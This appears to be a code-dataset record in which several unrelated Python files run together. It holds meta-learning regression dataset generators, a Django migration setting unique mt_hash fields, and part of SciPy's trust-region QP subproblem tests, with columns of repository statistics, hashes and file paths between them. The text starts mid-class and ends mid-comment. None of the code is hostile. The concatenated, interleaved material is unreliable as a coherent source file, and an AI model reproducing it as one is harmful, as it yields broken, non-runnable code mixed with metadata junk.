        super(MultiSinusoidsMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._input_range = input_range
        self._task_oracle = task_oracle
        self._noise_std = noise_std
        self._biases = biases
        # Base channel count (1, or 3 with parameter oracle) plus one
        # task-identity channel when the task oracle is on.
        if not self._oracle:
            self.input_size = 2 if self._task_oracle else 1
        else:
            self.input_size = 4 if self._task_oracle else 3
        self.output_size = 1
        self.num_tasks = 2

    def _generate_batch(self):
        half_batch_size = self._meta_batch_size // 2
        # First family: sinusoids shifted by biases[0] (task_id 0).
        sin1_inputs, sin1_outputs, amp1, phase1 = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=half_batch_size, oracle=self._oracle, bias=self._biases[0])
        sin1_task_infos = [{'task_id': 0, 'amp': amp1[i], 'phase': phase1[i]}
                           for i in range(len(amp1))]
        if self._task_oracle:
            sin1_inputs = np.concatenate(
                (sin1_inputs, np.zeros(sin1_inputs.shape[:2] + (1,))), axis=2)
        # Second family: sinusoids shifted by biases[1] (task_id 1).
        # BUG FIX: previously used biases[0] again, making both families
        # identical and defeating the purpose of the dataset.
        sin2_inputs, sin2_outputs, amp2, phase2 = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=half_batch_size, oracle=self._oracle, bias=self._biases[1])
        sin2_task_infos = [{'task_id': 1, 'amp': amp2[i], 'phase': phase2[i]}
                           for i in range(len(amp2))]
        if self._task_oracle:
            # BUG FIX: the task-identity channel for task 1 must be ones
            # (was zeros, making the two families indistinguishable to a
            # task-oracle model).
            sin2_inputs = np.concatenate(
                (sin2_inputs, np.ones(sin2_inputs.shape[:2] + (1,))), axis=2)
        inputs = np.concatenate((sin1_inputs, sin2_inputs))
        # BUG FIX: outputs previously concatenated sin2_outputs twice, so the
        # first half of outputs did not correspond to the first half of inputs.
        outputs = np.concatenate((sin1_outputs, sin2_outputs))
        if self._noise_std > 0:
            outputs = outputs + np.random.normal(scale=self._noise_std,
                                                 size=outputs.shape)
        task_infos = sin1_task_infos + sin2_task_infos
        return inputs, outputs, task_infos
def generate_tanh_batch(center_range, bias_range, slope_range, input_range,
                        num_samples, batch_size, oracle):
    """Sample a batch of shifted, scaled tanh regression tasks.

    Each task computes ``slope * tanh(x - center) + bias`` with per-task
    parameters drawn uniformly from the given ranges (``slope`` plays the
    role of an "alpha" scale).  When ``oracle`` is true, the per-task
    ``center`` and ``bias`` are appended to the inputs as extra channels.

    Returns:
        (inputs, outputs, slope, center, bias)
    """
    low, high = center_range
    center = np.random.uniform(low, high, [batch_size])
    low, high = bias_range
    bias = np.random.uniform(low, high, [batch_size])
    low, high = slope_range
    slope = np.random.uniform(low, high, [batch_size])
    outputs = np.zeros([batch_size, num_samples, 1])
    inputs = np.zeros([batch_size, num_samples, 1])
    for task in range(batch_size):
        x = np.random.uniform(input_range[0], input_range[1],
                              [num_samples, 1])
        inputs[task] = x
        outputs[task] = slope[task] * np.tanh(x - center[task]) + bias[task]
    if oracle:
        # Broadcast each task's parameters across its samples.
        center_feat = np.ones_like(inputs) * center.reshape(-1, 1, 1)
        bias_feat = np.ones_like(inputs) * bias.reshape(-1, 1, 1)
        inputs = np.concatenate((inputs, center_feat, bias_feat), axis=2)
    return inputs, outputs, slope, center, bias
def generate_abs_batch(slope_range, center_range, bias_range, input_range,
                       num_samples, batch_size, oracle):
    """Sample a batch of absolute-value regression tasks.

    Each task computes ``np.abs(x - center) * slope + bias`` with per-task
    parameters drawn uniformly from the given ranges.

    When ``oracle`` is true, two per-task parameter channels are appended to
    the inputs, matching the two-extra-channel layout of the other
    generators.

    Returns:
        (inputs, outputs, slope, center, bias)
    """
    slope = np.random.uniform(slope_range[0], slope_range[1], [batch_size])
    bias = np.random.uniform(bias_range[0], bias_range[1], [batch_size])
    center = np.random.uniform(center_range[0], center_range[1], [batch_size])
    outputs = np.zeros([batch_size, num_samples, 1])
    inputs = np.zeros([batch_size, num_samples, 1])
    for i in range(batch_size):
        inputs[i] = np.random.uniform(input_range[0], input_range[1],
                                      [num_samples, 1])
        outputs[i] = np.abs(inputs[i] - center[i]) * slope[i] + bias[i]
    if oracle:
        # BUG FIX: this branch referenced an undefined name `intersect`
        # (copied from the linear generator) and raised NameError whenever
        # oracle=True.  Append this family's own (slope, center) parameters
        # instead, keeping the two-extra-channel oracle layout.
        slopes = np.ones_like(inputs) * slope.reshape(-1, 1, 1)
        centers = np.ones_like(inputs) * center.reshape(-1, 1, 1)
        inputs = np.concatenate((inputs, slopes, centers), axis=2)
    return inputs, outputs, slope, center, bias
class FiveFunctionsMetaDataset(SimpleFunctionDataset):
    """Meta-dataset mixing five function families: sinusoid (task 0),
    linear (1), quadratic (2), tanh (3) and absolute-value (4) tasks."""

    def __init__(self, amp_range=[0.1, 5.0], phase_range=[0, np.pi],
                 input_range=[-5.0, 5.0], slope_range=[-3.0, 3.0],
                 intersect_range=[-3.0, 3.0], center_range=[-3.0, 3.0],
                 bias_range=[-3.0, 3.0], sign_range=[0.02, 0.15], task_oracle=False,
                 noise_std=0, **kwargs):
        super(FiveFunctionsMetaDataset, self).__init__(**kwargs)
        self._amp_range = amp_range
        self._phase_range = phase_range
        self._slope_range = slope_range
        self._intersect_range = intersect_range
        self._input_range = input_range
        self._center_range = center_range
        self._bias_range = bias_range
        self._sign_range = sign_range
        self._task_oracle = task_oracle
        self._noise_std = noise_std
        # The task-id oracle channel is not supported for this mixture.
        assert self._task_oracle == False
        # Base input is 1-D; the function oracle appends two parameter
        # channels; a task oracle (unsupported here) would append one more.
        if not self._oracle:
            self.input_size = 2 if self._task_oracle else 1
        else:
            self.input_size = 4 if self._task_oracle else 3
        self.output_size = 1
        # BUG FIX: this dataset mixes five task families (task_id 0..4),
        # not two.
        self.num_tasks = 5

    def _generate_batch(self):
        """Draw one fifth of the meta-batch from each of the five families.

        Returns:
            (inputs, outputs, task_infos) where task_infos records each
            sampled task's family id and parameters.
        """
        assert self._meta_batch_size % 5 == 0, 'Error size of meta batch.'
        # Renamed from the misleading `half_batch_size`: each family
        # contributes a fifth of the meta-batch.
        fifth_batch_size = self._meta_batch_size // 5
        sin_inputs, sin_outputs, amp, phase = generate_sinusoid_batch(
            amp_range=self._amp_range, phase_range=self._phase_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=fifth_batch_size, oracle=self._oracle)
        sin_task_infos = [{'task_id': 0, 'amp': amp[i], 'phase': phase[i]}
                          for i in range(len(amp))]
        lin_inputs, lin_outputs, slope, intersect = generate_linear_batch(
            slope_range=self._slope_range,
            intersect_range=self._intersect_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=fifth_batch_size, oracle=self._oracle)
        lin_task_infos = [{'task_id': 1, 'slope': slope[i], 'intersect': intersect[i]}
                          for i in range(len(slope))]
        qua_inputs, qua_outputs, sign, center, bias = generate_quadratic_batch(
            center_range=self._center_range,
            bias_range=self._bias_range,
            sign_range=self._sign_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=fifth_batch_size, oracle=self._oracle)
        qua_task_infos = [{'task_id': 2, 'sign': sign[i], 'center': center[i], 'bias': bias[i]}
                          for i in range(len(sign))]
        tanh_inputs, tanh_outputs, t_slope, t_center, t_bias = generate_tanh_batch(
            center_range=self._center_range,
            bias_range=self._bias_range,
            slope_range=self._slope_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=fifth_batch_size, oracle=self._oracle)
        # BUG FIX: these infos previously iterated over range(len(sign)) --
        # the quadratic batch's parameters -- instead of this family's own.
        tanh_task_infos = [{'task_id': 3, 'slope': t_slope[i], 'center': t_center[i], 'bias': t_bias[i]}
                           for i in range(len(t_slope))]
        abs_inputs, abs_outputs, a_slope, a_center, a_bias = generate_abs_batch(
            slope_range=self._slope_range,
            center_range=self._center_range,
            bias_range=self._bias_range,
            input_range=self._input_range,
            num_samples=self._num_total_samples,
            batch_size=fifth_batch_size, oracle=self._oracle)
        # BUG FIX: same range(len(sign)) copy-paste as above.
        abs_task_infos = [{'task_id': 4, 'slope': a_slope[i], 'center': a_center[i], 'bias': a_bias[i]}
                          for i in range(len(a_slope))]
        inputs = np.concatenate((sin_inputs, lin_inputs, qua_inputs, tanh_inputs, abs_inputs))
        outputs = np.concatenate((sin_outputs, lin_outputs, qua_outputs, tanh_outputs, abs_outputs))
        if self._noise_std > 0:
            outputs = outputs + np.random.normal(scale=self._noise_std, size=outputs.shape)
        task_infos = (sin_task_infos + lin_task_infos + qua_task_infos
                      + tanh_task_infos + abs_task_infos)
        return inputs, outputs, task_infos
| 43.572993
| 104
| 0.611065
| 3,068
| 23,878
| 4.40515
| 0.041721
| 0.059267
| 0.032186
| 0.03374
| 0.831225
| 0.79963
| 0.787051
| 0.773289
| 0.748428
| 0.732815
| 0
| 0.020567
| 0.279169
| 23,878
| 547
| 105
| 43.652651
| 0.764641
| 0.003476
| 0
| 0.736052
| 1
| 0
| 0.015345
| 0
| 0
| 0
| 0
| 0
| 0.004292
| 1
| 0.051502
| false
| 0
| 0.006438
| 0
| 0.10515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5331b41acb4a9a98948891720c0859072423e0e6
| 2,696
|
py
|
Python
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 634
|
2015-10-30T00:55:40.000Z
|
2022-03-31T02:59:00.000Z
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 145
|
2015-11-06T00:17:33.000Z
|
2022-03-16T13:30:31.000Z
|
zentral/contrib/inventory/migrations/0017_auto_20161212_2356.py
|
arubdesu/zentral
|
ac0fe663f6e1c27f9a9f55a7500a87e6ac7d9190
|
[
"Apache-2.0"
] | 103
|
2015-11-07T07:08:49.000Z
|
2022-03-18T17:34:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-12 23:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make `mt_hash` a unique 40-char field on every inventory model."""

    dependencies = [
        ('inventory', '0016_auto_20161212_1457'),
    ]

    # The same AlterField applies to every model; build the identical
    # operation once per model name instead of repeating it fourteen times.
    operations = [
        migrations.AlterField(
            model_name=model_name,
            name='mt_hash',
            field=models.CharField(max_length=40, unique=True),
        )
        for model_name in (
            'businessunit',
            'certificate',
            'debpackage',
            'link',
            'machine',
            'machinegroup',
            'machinesnapshot',
            'networkinterface',
            'osversion',
            'osxapp',
            'osxappinstance',
            'source',
            'systeminfo',
            'teamviewer',
        )
    ]
| 31.348837
| 63
| 0.558605
| 261
| 2,696
| 5.578544
| 0.218391
| 0.192308
| 0.240385
| 0.278846
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0.749313
| 0
| 0.033498
| 0.324555
| 2,696
| 85
| 64
| 31.717647
| 0.766063
| 0.025223
| 0
| 0.717949
| 1
| 0
| 0.103619
| 0.008762
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
533aff3196a31302de588349daa54251c51b77ba
| 27,931
|
py
|
Python
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 15
|
2020-06-29T08:33:39.000Z
|
2022-02-12T00:28:51.000Z
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 30
|
2020-04-15T19:37:40.000Z
|
2020-04-22T21:19:35.000Z
|
chatbot_env/Lib/site-packages/scipy/optimize/_trustregion_constr/tests/test_qp_subproblem.py
|
rakmakan/Chatbot
|
d04bc1526b56961a16c25148d9ef18c4f157e9c4
|
[
"MIT"
] | 11
|
2020-06-29T08:40:24.000Z
|
2022-02-24T17:39:16.000Z
|
import numpy as np
from scipy.sparse import csc_matrix
from scipy.optimize._trustregion_constr.qp_subproblem \
import (eqp_kktfact,
projected_cg,
box_intersections,
sphere_intersections,
box_sphere_intersections,
modified_dogleg)
from scipy.optimize._trustregion_constr.projections \
import projections
from numpy.testing import (TestCase, assert_array_almost_equal,
assert_array_equal, assert_array_less,
assert_equal, assert_,
run_module_suite, assert_allclose, assert_warns,
dec)
import pytest
class TestEQPDirectFactorization(TestCase):
    """Direct KKT factorization of an equality-constrained QP."""

    def test_nocedal_example(self):
        # Equality-constrained QP from Nocedal & Wright,
        # "Numerical Optimization", Example 16.2, p. 452.
        hess = csc_matrix([[6, 2, 1],
                           [2, 5, 2],
                           [1, 2, 4]])
        jac = csc_matrix([[1, 0, 1],
                          [0, 1, 1]])
        grad = np.array([-8, -3, -3])
        rhs = -np.array([3, 0])
        x, lagrange_multipliers = eqp_kktfact(hess, grad, jac, rhs)
        assert_array_almost_equal(x, [2, -1, 1])
        assert_array_almost_equal(lagrange_multipliers, [3, -2])
class TestSphericalBoundariesIntersections(TestCase):
    """Tests for sphere_intersections: the parameter interval [ta, tb] where
    the ray/line z + t*d meets a ball of given radius centered at the origin.
    """

    def test_2d_sphere_constraints(self):
        # Initial point in the interior of the ball.
        ta, tb, intersect = sphere_intersections([0, 0],
                                                 [1, 0], 0.5)
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # No intersection between line and circle.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [0, 1], 1)
        assert_equal(intersect, False)
        # Outside initial point pointing away from the circle.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [1, 0], 1)
        assert_equal(intersect, False)
        # Outside initial point pointing toward the inside of the circle.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [-1, 0], 1.5)
        assert_array_almost_equal([ta, tb], [0.5, 1])
        assert_equal(intersect, True)
        # Initial point exactly on the boundary.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [1, 0], 2)
        assert_array_almost_equal([ta, tb], [0, 0])
        assert_equal(intersect, True)

    def test_2d_sphere_constraints_line_intersections(self):
        """Same geometry as above, but entire_line=True allows t < 0."""
        # Initial point in the interior of the ball.
        ta, tb, intersect = sphere_intersections([0, 0],
                                                 [1, 0], 0.5,
                                                 entire_line=True)
        assert_array_almost_equal([ta, tb], [-0.5, 0.5])
        assert_equal(intersect, True)
        # No intersection between line and circle.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [0, 1], 1,
                                                 entire_line=True)
        assert_equal(intersect, False)
        # Outside initial point pointing away from the circle; the full
        # line still crosses the ball behind the initial point.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [1, 0], 1,
                                                 entire_line=True)
        assert_array_almost_equal([ta, tb], [-3, -1])
        assert_equal(intersect, True)
        # Outside initial point pointing toward the inside of the circle.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [-1, 0], 1.5,
                                                 entire_line=True)
        assert_array_almost_equal([ta, tb], [0.5, 3.5])
        assert_equal(intersect, True)
        # Initial point exactly on the boundary.
        ta, tb, intersect = sphere_intersections([2, 0],
                                                 [1, 0], 2,
                                                 entire_line=True)
        assert_array_almost_equal([ta, tb], [-4, 0])
        assert_equal(intersect, True)
class TestBoxBoundariesIntersections(TestCase):
    """Tests for box_intersections: the parameter interval [ta, tb] where the
    ray/line z + t*d stays inside the box [lb, ub]."""

    def test_2d_box_constraints(self):
        # Box constraint in the direction of vector d.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [1, 1], [3, 3])
        assert_array_almost_equal([ta, tb], [0.5, 1])
        assert_equal(intersect, True)
        # Negative direction.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [1, -3], [3, -1])
        assert_equal(intersect, False)
        # Some constraints are absent (set to +/- inf).
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-np.inf, 1],
                                              [np.inf, np.inf])
        assert_array_almost_equal([ta, tb], [0.5, 1])
        assert_equal(intersect, True)
        # Intersect on the face of the box.
        ta, tb, intersect = box_intersections([1, 0], [0, 1],
                                              [1, 1], [3, 3])
        assert_array_almost_equal([ta, tb], [1, 1])
        assert_equal(intersect, True)
        # Initial point in the interior of the box.
        ta, tb, intersect = box_intersections([0, 0], [4, 4],
                                              [-2, -3], [3, 2])
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # No intersection between line and box constraints.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, -3], [-1, -1])
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, 3], [-1, 1])
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, -np.inf],
                                              [-1, np.inf])
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([0, 0], [1, 100],
                                              [1, 1], [3, 3])
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([0.99, 0], [0, 2],
                                              [1, 1], [3, 3])
        assert_equal(intersect, False)
        # Initial point on the boundary of the box.
        ta, tb, intersect = box_intersections([2, 2], [0, 1],
                                              [-2, -2], [2, 2])
        assert_array_almost_equal([ta, tb], [0, 0])
        assert_equal(intersect, True)

    def test_2d_box_constraints_entire_line(self):
        """Same cases as above, but entire_line=True allows t < 0."""
        # Box constraint in the direction of vector d.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [1, 1], [3, 3],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [0.5, 1.5])
        assert_equal(intersect, True)
        # Negative direction.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [1, -3], [3, -1],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [-1.5, -0.5])
        assert_equal(intersect, True)
        # Some constraints are absent (set to +/- inf).
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-np.inf, 1],
                                              [np.inf, np.inf],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [0.5, np.inf])
        assert_equal(intersect, True)
        # Intersect on the face of the box.
        ta, tb, intersect = box_intersections([1, 0], [0, 1],
                                              [1, 1], [3, 3],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [1, 3])
        assert_equal(intersect, True)
        # Initial point in the interior of the box.
        ta, tb, intersect = box_intersections([0, 0], [4, 4],
                                              [-2, -3], [3, 2],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [-0.5, 0.5])
        assert_equal(intersect, True)
        # No intersection between line and box constraints.
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, -3], [-1, -1],
                                              entire_line=True)
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, 3], [-1, 1],
                                              entire_line=True)
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([2, 0], [0, 2],
                                              [-3, -np.inf],
                                              [-1, np.inf],
                                              entire_line=True)
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([0, 0], [1, 100],
                                              [1, 1], [3, 3],
                                              entire_line=True)
        assert_equal(intersect, False)
        ta, tb, intersect = box_intersections([0.99, 0], [0, 2],
                                              [1, 1], [3, 3],
                                              entire_line=True)
        assert_equal(intersect, False)
        # Initial point on the boundary of the box.
        ta, tb, intersect = box_intersections([2, 2], [0, 1],
                                              [-2, -2], [2, 2],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [-4, 0])
        assert_equal(intersect, True)

    def test_3d_box_constraints(self):
        # Simple case.
        ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, 1],
                                              [1, 1, 1], [3, 3, 3])
        assert_array_almost_equal([ta, tb], [1, 1])
        assert_equal(intersect, True)
        # Negative direction.
        ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, -1],
                                              [1, 1, 1], [3, 3, 3])
        assert_equal(intersect, False)
        # Interior point.
        ta, tb, intersect = box_intersections([2, 2, 2], [0, -1, 1],
                                              [1, 1, 1], [3, 3, 3])
        assert_array_almost_equal([ta, tb], [0, 1])
        assert_equal(intersect, True)

    def test_3d_box_constraints_entire_line(self):
        """3-D cases with entire_line=True (t may be negative)."""
        # Simple case.
        ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, 1],
                                              [1, 1, 1], [3, 3, 3],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [1, 3])
        assert_equal(intersect, True)
        # Negative direction.
        ta, tb, intersect = box_intersections([1, 1, 0], [0, 0, -1],
                                              [1, 1, 1], [3, 3, 3],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [-3, -1])
        assert_equal(intersect, True)
        # Interior point.
        ta, tb, intersect = box_intersections([2, 2, 2], [0, -1, 1],
                                              [1, 1, 1], [3, 3, 3],
                                              entire_line=True)
        assert_array_almost_equal([ta, tb], [-1, 1])
        assert_equal(intersect, True)
class TestBoxSphereBoundariesIntersections(TestCase):
    """Tests for box_sphere_intersections: [ta, tb] interval where z + t*d
    satisfies both the box [lb, ub] and a ball of the given radius."""

    def test_2d_box_constraints(self):
        # Both constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-2, 2],
                                                     [-1, -2], [1, 2], 2,
                                                     entire_line=False)
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # None of the constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-1, 1],
                                                     [-1, -3], [1, 3], 10,
                                                     entire_line=False)
        assert_array_almost_equal([ta, tb], [0, 1])
        assert_equal(intersect, True)
        # Box constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [-1, -3], [1, 3], 10,
                                                     entire_line=False)
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # Spherical constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [-1, -3], [1, 3], 2,
                                                     entire_line=False)
        assert_array_almost_equal([ta, tb], [0, 0.25])
        assert_equal(intersect, True)
        # Infeasible problems.
        ta, tb, intersect = box_sphere_intersections([2, 2], [-4, 4],
                                                     [-1, -3], [1, 3], 2,
                                                     entire_line=False)
        assert_equal(intersect, False)
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [2, 4], [2, 4], 2,
                                                     entire_line=False)
        assert_equal(intersect, False)

    def test_2d_box_constraints_entire_line(self):
        """Same cases as above, but entire_line=True allows t < 0."""
        # Both constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-2, 2],
                                                     [-1, -2], [1, 2], 2,
                                                     entire_line=True)
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # None of the constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-1, 1],
                                                     [-1, -3], [1, 3], 10,
                                                     entire_line=True)
        assert_array_almost_equal([ta, tb], [0, 2])
        assert_equal(intersect, True)
        # Box constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [-1, -3], [1, 3], 10,
                                                     entire_line=True)
        assert_array_almost_equal([ta, tb], [0, 0.5])
        assert_equal(intersect, True)
        # Spherical constraints are active.
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [-1, -3], [1, 3], 2,
                                                     entire_line=True)
        assert_array_almost_equal([ta, tb], [0, 0.25])
        assert_equal(intersect, True)
        # Infeasible problems.
        ta, tb, intersect = box_sphere_intersections([2, 2], [-4, 4],
                                                     [-1, -3], [1, 3], 2,
                                                     entire_line=True)
        assert_equal(intersect, False)
        ta, tb, intersect = box_sphere_intersections([1, 1], [-4, 4],
                                                     [2, 4], [2, 4], 2,
                                                     entire_line=True)
        assert_equal(intersect, False)
class TestModifiedDogleg(TestCase):
    """Tests for modified_dogleg: approximate minimizer of the linearized
    constraint violation inside a trust region and box bounds."""

    def test_cauchypoint_equalsto_newtonpoint(self):
        A = np.array([[1, 8]])
        b = np.array([-16])
        _, _, Y = projections(A)
        newton_point = np.array([0.24615385, 1.96923077])
        # Newton point inside boundaries.
        x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf], [np.inf, np.inf])
        assert_array_almost_equal(x, newton_point)
        # Spherical constraint active: solution is the scaled-down Newton
        # point on the trust-region boundary.
        x = modified_dogleg(A, Y, b, 1, [-np.inf, -np.inf], [np.inf, np.inf])
        assert_array_almost_equal(x, newton_point/np.linalg.norm(newton_point))
        # Box constraints active: first coordinate clipped at 0.1.
        x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf], [0.1, np.inf])
        assert_array_almost_equal(x, (newton_point/newton_point[0]) * 0.1)

    def test_3d_example(self):
        A = np.array([[1, 8, 1],
                      [4, 2, 2]])
        b = np.array([-16, 2])
        Z, LS, Y = projections(A)
        newton_point = np.array([-1.37090909, 2.23272727, -0.49090909])
        cauchy_point = np.array([0.11165723, 1.73068711, 0.16748585])
        origin = np.zeros_like(newton_point)
        # newton_point inside boundaries.
        x = modified_dogleg(A, Y, b, 3, [-np.inf, -np.inf, -np.inf],
                            [np.inf, np.inf, np.inf])
        assert_array_almost_equal(x, newton_point)
        # Line between cauchy_point and newton_point contains the best point
        # (spherical constraint is active).  The parameter t below recovers
        # where on that segment x lies; it must be the same in every
        # coordinate.
        x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf, -np.inf],
                            [np.inf, np.inf, np.inf])
        z = cauchy_point
        d = newton_point-cauchy_point
        t = ((x-z)/(d))
        assert_array_almost_equal(t, np.full(3, 0.40807330))
        assert_array_almost_equal(np.linalg.norm(x), 2)
        # Line between cauchy_point and newton_point contains the best point
        # (box constraint is active).
        x = modified_dogleg(A, Y, b, 5, [-1, -np.inf, -np.inf],
                            [np.inf, np.inf, np.inf])
        z = cauchy_point
        d = newton_point-cauchy_point
        t = ((x-z)/(d))
        assert_array_almost_equal(t, np.full(3, 0.7498195))
        assert_array_almost_equal(x[0], -1)
        # Line between origin and cauchy_point contains the best point
        # (spherical constraint is active).
        x = modified_dogleg(A, Y, b, 1, [-np.inf, -np.inf, -np.inf],
                            [np.inf, np.inf, np.inf])
        z = origin
        d = cauchy_point
        t = ((x-z)/(d))
        assert_array_almost_equal(t, np.full(3, 0.573936265))
        assert_array_almost_equal(np.linalg.norm(x), 1)
        # Line between origin and newton_point contains the best point
        # (box constraint is active).
        x = modified_dogleg(A, Y, b, 2, [-np.inf, -np.inf, -np.inf],
                            [np.inf, 1, np.inf])
        z = origin
        d = newton_point
        t = ((x-z)/(d))
        assert_array_almost_equal(t, np.full(3, 0.4478827364))
        assert_array_almost_equal(x[1], 1)
class TestProjectCG(TestCase):
    """Tests for projected_cg: projected conjugate-gradient solver for
    equality-constrained QPs with optional trust-region and box bounds.

    The info dict's "stop_cond" codes asserted below: 1 = gradient tolerance,
    2 = trust-region/box boundary reached, 3 = negative curvature,
    4 = direct factorization path (per the assertions in this suite --
    NOTE(review): confirm codes against qp_subproblem's documentation).
    """

    # From Example 16.2 Nocedal/Wright "Numerical
    # Optimization" p.452.
    def test_nocedal_example(self):
        H = csc_matrix([[6, 2, 1],
                        [2, 5, 2],
                        [1, 2, 4]])
        A = csc_matrix([[1, 0, 1],
                        [0, 1, 1]])
        c = np.array([-8, -3, -3])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b)
        assert_equal(info["stop_cond"], 4)
        assert_equal(info["hits_boundary"], False)
        assert_array_almost_equal(x, [2, -1, 1])

    def test_compare_with_direct_fact(self):
        # Unconstrained-by-bounds solve must match the direct KKT solution.
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        Z, _, Y = projections(A)
        x, info = projected_cg(H, c, Z, Y, b, tol=0)
        x_kkt, _ = eqp_kktfact(H, c, A, b)
        assert_equal(info["stop_cond"], 1)
        assert_equal(info["hits_boundary"], False)
        assert_array_almost_equal(x, x_kkt)

    def test_trust_region_infeasible(self):
        # Trust radius too small to contain any feasible point.
        H = csc_matrix([[6, 2, 1, 3],
                        [2, 5, 2, 4],
                        [1, 2, 4, 5],
                        [3, 4, 5, 7]])
        A = csc_matrix([[1, 0, 1, 0],
                        [0, 1, 1, 1]])
        c = np.array([-2, -3, -3, 1])
        b = -np.array([3, 0])
        trust_radius = 1
        Z, _, Y = projections(A)
        with pytest.raises(ValueError):
            projected_cg(H, c, Z, Y, b, trust_radius=trust_radius)

    def test_trust_region_barely_feasible(self):
        # Trust radius exactly equal to the norm of the minimum-norm
